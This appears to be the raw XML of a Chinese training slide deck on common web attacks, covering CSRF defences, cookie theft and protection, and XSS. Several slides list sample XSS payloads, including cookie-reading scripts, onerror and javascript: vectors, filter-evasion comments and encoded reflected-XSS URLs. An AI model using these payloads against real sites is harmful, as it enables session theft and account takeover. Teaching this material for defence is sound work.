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notesMasterIdLst>
    <p:notesMasterId r:id="rId32"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="272" r:id="rId3"/>
    <p:sldId id="370" r:id="rId4"/>
    <p:sldId id="400" r:id="rId5"/>
    <p:sldId id="397" r:id="rId6"/>
    <p:sldId id="399" r:id="rId7"/>
    <p:sldId id="401" r:id="rId8"/>
    <p:sldId id="403" r:id="rId9"/>
    <p:sldId id="434" r:id="rId10"/>
    <p:sldId id="404" r:id="rId11"/>
    <p:sldId id="419" r:id="rId12"/>
    <p:sldId id="420" r:id="rId13"/>
    <p:sldId id="421" r:id="rId14"/>
    <p:sldId id="422" r:id="rId15"/>
    <p:sldId id="423" r:id="rId16"/>
    <p:sldId id="424" r:id="rId17"/>
    <p:sldId id="427" r:id="rId18"/>
    <p:sldId id="428" r:id="rId19"/>
    <p:sldId id="430" r:id="rId20"/>
    <p:sldId id="431" r:id="rId21"/>
    <p:sldId id="432" r:id="rId22"/>
    <p:sldId id="426" r:id="rId23"/>
    <p:sldId id="425" r:id="rId24"/>
    <p:sldId id="429" r:id="rId25"/>
    <p:sldId id="433" r:id="rId26"/>
    <p:sldId id="435" r:id="rId27"/>
    <p:sldId id="436" r:id="rId28"/>
    <p:sldId id="437" r:id="rId29"/>
    <p:sldId id="438" r:id="rId30"/>
    <p:sldId id="41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2873" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-19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3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3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2cto.com/kf/qianduan/css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04856" cy="1368152"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>常见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击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儒明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41B2BD3B-D5B0-437C-9C09-6AF9ABDB7BC5}" type="datetime5">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/8/26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1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/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防御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124744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(1).Cookie Hashing(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所有表单都包含同一个伪随机值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(2).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>验证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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(3).One-Time Tokens(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同的表单包含一个不同的伪随机值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(4) .  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenBoth" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.  ……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenBoth" startAt="5"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>给表单生成一个随机密码，提交的时候服务器校验密码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>令牌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在转账的时候不要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>看美女（切记）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6248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1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290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/>
              <a:t>Cookie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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>. Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a: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Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，大部分网站都用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来存储用户认证信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>.Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>攻击是什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网站依赖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来验证用户身份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，那么攻击者就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>截取、偷取你的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>假冒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>你</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的身份来做一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>事情</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a: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75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290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获取方法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704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直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>读取磁盘的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息存放目录是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C:/Documents and Settings/%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>yourname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>%/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Cookies,FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Profiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录中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endParaRPr lang="zh-CN" altLang="en-US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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网络嗅探器来获取网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>上传输的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>管理工具获取内存或者文件系统中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Cookie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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>跨站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>脚本（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>盗取别人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Cookie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最常见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37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290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防范利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行的攻击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不要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中保存敏感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不要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中保存没有经过加密的或者容易被解密的敏感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对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>从客户端取得的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息进行严格</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>校验</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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71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290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跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(XSS)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7048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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>.XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/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 XSS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Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>），中文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean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跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击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b="1" dirty="0" smtClean="0"/>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>.XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>可以做什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击者在网页上发布包含攻击性代码的数据。当浏览者看到此网页时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>特定的脚本就会以浏览者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的身份和权限来执行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必要前题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35060"/>
            <a:ext cx="5238153" cy="577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52120" y="2060848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最常见的地方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</a:rPr>
              <a:t>论坛</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin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微薄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商品、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>店铺</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>评论区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能发布文本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>&amp;&amp;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有大批量用户浏览</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>的地方</a:t>
            </a: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11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6" y="1052736"/>
            <a:ext cx="6573366" cy="44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9564" y="1124744"/>
            <a:ext cx="2643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最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原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>的样子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/>
              <a:t>&lt;script&gt;alert(1)&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;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目标：让用户的浏览器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执行我们的脚本，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只要能执行成功我们就可以在用户的浏览器为所欲为了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0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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>长什么样子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333217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&lt;script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(‘XSS')&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>最普通的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代码</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>);&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>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javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>('XSS')"&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>链接地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xss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&lt;script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="ls.js"&gt; &lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>外部调用攻击代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ls.js</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注释了把*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>')&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注释方法防止过滤</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>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="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=alert("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>")&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>加载图像失败执行</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(‘XSS')&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>框架</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;script&gt;location='123.com';&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>跳转某页面</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>body{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>background-image:url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javascript:alert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xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>”))} 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样式</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;a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javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>('XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>')"&gt;XSS&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>a&gt; a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>链接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>xss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741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 XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>长什么样子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33321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http://www.xxx.cn/search?q=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3Cscript%3E%20alert%28%27%E5%BA%97%E5%B0%8F%E4%B8%89%27%29%3B%3C%2Fscript%3E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http://www.xxx.com/third.cgi?w=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3Cscript%3E+alert%28%2F70826450%2F%29%3B%3C%2Fscript%3E&amp;y=5&amp;k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=&amp;netid=&amp;v=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>D7%DB%BA%CF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>inhesearch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search.jsp?channelid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=75029&amp;searchword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
